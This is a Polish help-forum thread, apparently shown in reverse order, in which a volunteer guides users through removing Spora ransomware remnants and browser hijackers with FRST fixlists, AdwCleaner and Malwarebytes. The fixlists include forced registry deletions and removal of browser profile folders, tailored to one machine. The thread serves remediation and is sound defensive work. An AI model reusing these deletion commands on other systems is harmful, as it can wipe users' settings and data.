HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} SearchScopes: HKU\S-1-5-21-2928031591-3755042668-476525210-1003 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYu7AylGRx230evXqe-RyAwF_kPZKwEXN9fTzUSlVGaTaWCoCYd0Pybhz0KeX7gDkv2txfhHl14xn80Rfm5mX0F4_HCTTpKydPB4jxA5kdPPBZfu4Un-Ss_rssgJZJ49rvAmrvlnDy_xnSyEEBXY4YeCxTYWQ,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-2928031591-3755042668-476525210-1003 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYu7AylGRx230evXqe-RyAwF_kPZKwEXN9fTzUSlVGaTaWCoCYd0Pybhz0KeX7gDkv2txfhHl14xn80Rfm5mX0F4_HCTTpKydPB4jxA5kdPPBZfu4Un-Ss_rssgJZJ49rvAmrvlnDy_xnSyEEBXY4YeCxTYWQ,,&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\SAWNY~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\SAWNY~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Sławny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\SAWNY~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ FirewallRules: [{579ACB29-0326-42FE-A2C8-F4B80AEA545E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Users\Sławny\Desktop\Wszystko\Driver Easy.lnk C:\Users\Sławny\Desktop\Wszystko\Mozilla Firefox.lnk Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Sławny\AppData\Local\Mozilla C:\Users\Sławny\AppData\Roaming\Mozilla C:\Users\Sławny\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 4. Powtórz skan AdwCleaner do uzyskania wyniku zero infekcji. Znalezione zagrożenia od razu kasuj (używając opcji Oczyść). Dostarcz raport. 5. Zrób nowy zestaw raportów FRST i GMER. Dołącz też plik Fixlog.

Już mówiłem, że cześć zaszyfrowana jest nie do odzyskania na tą chwile. Szansę na to, że dekoder będzie...marne. Na Twoim miejscu chyba wziąłbym każde inne urządzenie i kończył pracę magisterską - Twój temat ze względu na to i tak ma priorytet. Nie wiem ile nam to jeszcze zajmę, może dzień, może dwa - ale pliki, które nie są zaszyfrowane przeskanowałbym osobno jakimś skanerem np. Kaspersky / BitDefender jak będą czyste to dopiero wtedy przenieś na inne urządzenie. System jeszcze czysty nie jest, konta w banku powinny być bezpieczne, niemniej jednak po dezynfekcji obowiązkowa zmiana haseł w serwisach logowania. Co do formatu - mówiłem, że zalecany. Dane po skanie (te niezaszyfrowane, bo zaszyfrowanych nie musisz skanować) skopiować na dysk zewnętrzny i potem przenieś na nowy system. Zostały jeszcze wpisy, które uruchamiają notatkę deszyfracją w przeglądarce, ale jest lepiej względem wcześniejszej sytuacji. 1. Powtórz działanie związane z RansomNoteCleaner. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Startup: C:\Users\Piotr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html [2017-04-18] () C:\Users\Piotr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html 2017-04-18 15:08 - 2017-04-18 15:08 - 00016670 _____ C:\Users\Piotr\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html 2017-04-18 15:08 - 2017-04-18 15:08 - 00016670 _____ C:\Users\Piotr\Desktop\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html 2017-04-18 15:08 - 2017-04-18 15:08 - 00016670 _____ C:\Users\Piotr\AppData\Roaming\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html 2017-04-18 15:08 - 2017-04-18 15:08 - 00016670 _____ C:\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html 2017-04-18 15:08 - 2017-04-18 15:08 - 0016670 _____ () C:\Users\Piotr\AppData\Roaming\PO1B5-41ORA-FTOKK-ATHFA-HTHTR-HRZAT-XGKEY.html C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PESEdit.com 2014 Patch\PESEdit.com 2014 Patch.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PESEdit.com 2014 Patch\Settings.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Powtórz skan (do wyniku zero infekcji) Malwarebytes, jeśli coś wykryje daj wszystko do kwarantanny. Nie przenoś tylko plików szyfrowanych, jeśli takowe zostaną wykryte. Dostarcz raporty 4. Zrób nowy zestaw raportów FRST i GMER - jak będzie wszystko OK w raportach to robimy skan plików i je przeniesiesz poza system.

1. Teraz prawnie jestem nie do ruszenia (i zespół SpyHuntera może mi skoczyć ), bo deinstalacja SpyHuntera była decyzją użytkownika. Posprzątaj po nim ostatecznie wykorzystując narzędzie SpyHunterCleaner. 2. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). 3. Wszystkie zagrożenia wykryte przez Malwarebytes daj do kasacji. 4. Zrób nowy zestaw raportów FRST i GMER, powiedz też jak widzisz obecnie system.

Dziwna sprawa, wygląda na to, że coś uniemożliwiło zaszyfrowanie wszystkich plików, a tylko części - no nic - tylko się cieszyć. Masz farta. Korzystasz z oprogramowania SpyHunter, a to delikatnie mówiąc program o bardzo wątpliwej reputacji. Cytuję z tematu picasso: Jeśli Ty zechcesz się go pozbyć to odinstalujesz go z poziomu panelu sterowania (jeśli będę problemy, a mogą być bo instalacja wygląda na uszkodzoną to zastosujesz program SpyHunterCleaner). Żeby było jasne: to Twoja decyzja, ja nic nie sugeruję. Przechodzimy do czyszczenia. 1. Zastoju RansomNoteCleaner, które usunie wszystkie notatki dot. uiszczenia haraczu. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [mbot_pl_160] => [X] HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-689862577-831822958-2091172563-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-689862577-831822958-2091172563-1000\...\Policies\Explorer: [] HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hp&ts=1438338495&z=cf471b2753c8cebad7ef8d5g4z5c8b4c8c3b8z1z0e&from=cor&uid=HitachiXHTS547550A9E384_J2150050CUP3WDCUP3WDX HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-689862577-831822958-2091172563-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-689862577-831822958-2091172563-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = S3 VGPU; System32\drivers\rdvgkmd.sys [X] HKU\S-1-5-21-689862577-831822958-2091172563-1000\...\ChromeHTML: -> Task: {06E81ADC-539E-4B57-BA04-272597C14302} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: {322EC3A8-A66F-477E-AE12-7F5AC5270FBF} - \AutoKMS -> Brak pliku Task: {780987FC-7FB1-446E-8183-F70318C3FC0D} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe Task: {88A35B11-9E91-4718-80F1-046326946587} - System32\Tasks\SMupdate1 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update1 Task: {A40DC6E8-CCA8-4F65-B453-03C896134550} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update3 Task: {C60F9AD4-0C1C-491F-A191-D77F9CCFE95F} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update2 Task: {E60B47A1-F70B-49DC-81A1-8D82226E1385} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\AFPL License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\FairPlay License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\GPL License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Matroska Pack\MatroskaDiag.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Matroska Pack\Read Me.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Matroska Pack\Uninstall the Matroska Pack.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HydroCAD\Uninstall HydroCAD.lnk C:\Users\Piotr\AppData\Roaming\Microsoft\Windows\Start Menu\BitTorrent.lnk C:\Users\Piotr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Age of Empires III™.lnk C:\Users\Piotr\AppData\Roaming\Microsoft\Virtual PC\Virtual Machines\Windows XP.lnk C:\Users\Piotr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pes-Patch.com 2015 v0.1 by lagun-2 part1\Uninstall Pes-Patch.com 2015 v0.1 by lagun-2 part1.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W raportach brak oznak infekcji, co więcej nic też nie wskazuję na infekcję routera. Adresy pokazane w logu Addition i FRST są poprawne, sprawdziłem również adres IP, z którego logujesz się na forum i on również jest poprawny. Jednak mam pytanie czy świadomie używasz przeglądarki Pale Moon*? * - nie ufam w ogóle takim przeglądarką, przykład z Maxthon. Nie ma w co wierzyć z tą szybkością i optymalizacją, należy korzystać z renomowanych przeglądarek, czyli m.in czysta Mozilla, Google Chrome, Opera. Pokaż mi wygląd przykładowej reklamy / przekierowania na stronę. Na jakich konkretnie stronach to występuję? Niestety, ale w dzisiejszej dobie internetu reklamy to rzecz normalna.

Naprawdę bardzo mi przykro to pisząc. System został zainfekowany przez Ransomware Spora. Do tej pory nie wynaleziono skutecznego dekodera plików, który byłby w stanie odszyfrować pliki. Tym samym chcę powiedzieć, że poza zapłaceniem okupu pliki są nie do odzyskania. Dane polecam po dezynfekcji skopiować na jakiś dysk zewnętrzny i poczekać - może kiedyś będzie dekoder. Jeśli na tym komputerze był plik z pracą magisterską to jest zaszyfrowany i nie do odzyskania. O zapłaceniu okupu nawet nie myśl, to wysokie ceny i nie ma żadnej pewności na pomyślność deszyfracji (KLIK / KLIK). Nie ukrywam, że w przypadku tego typu infekcji zalecany jest kompleksowy format wszystkich dostępnych dysków. Napisz na co się decydujesz - czy leczymy system, czy go formatujesz i kopiujesz dane na inny nośnik.

Brakuje trzeciego obowiązkowego raportu Shortcut genrowanego przez FRST - dołącz go. Wyjaśnij pochodzenie pliku Fixlist.

To infekcja Ransomware szyfrująca dane, ale przed podjęciem działań poproszę jeszcze o rozszerzenie diagnostyki względem szczepu Ransoma. W tym celu wysili zaszyfrowany plik (lub notatkę na temat deszyfracji w odpowiednim miejscu na stronie ID Ransomware) na serwer usługi ID Ransomware i dostarcz wynik analizy. Nie chcę zapeszać, ale większość danych, które są szyfrowane przez tego typu infekcję są nie do odzyskania.

W takim razie kończymy. Zastoju DelFix (kasacja używanych narzędzi).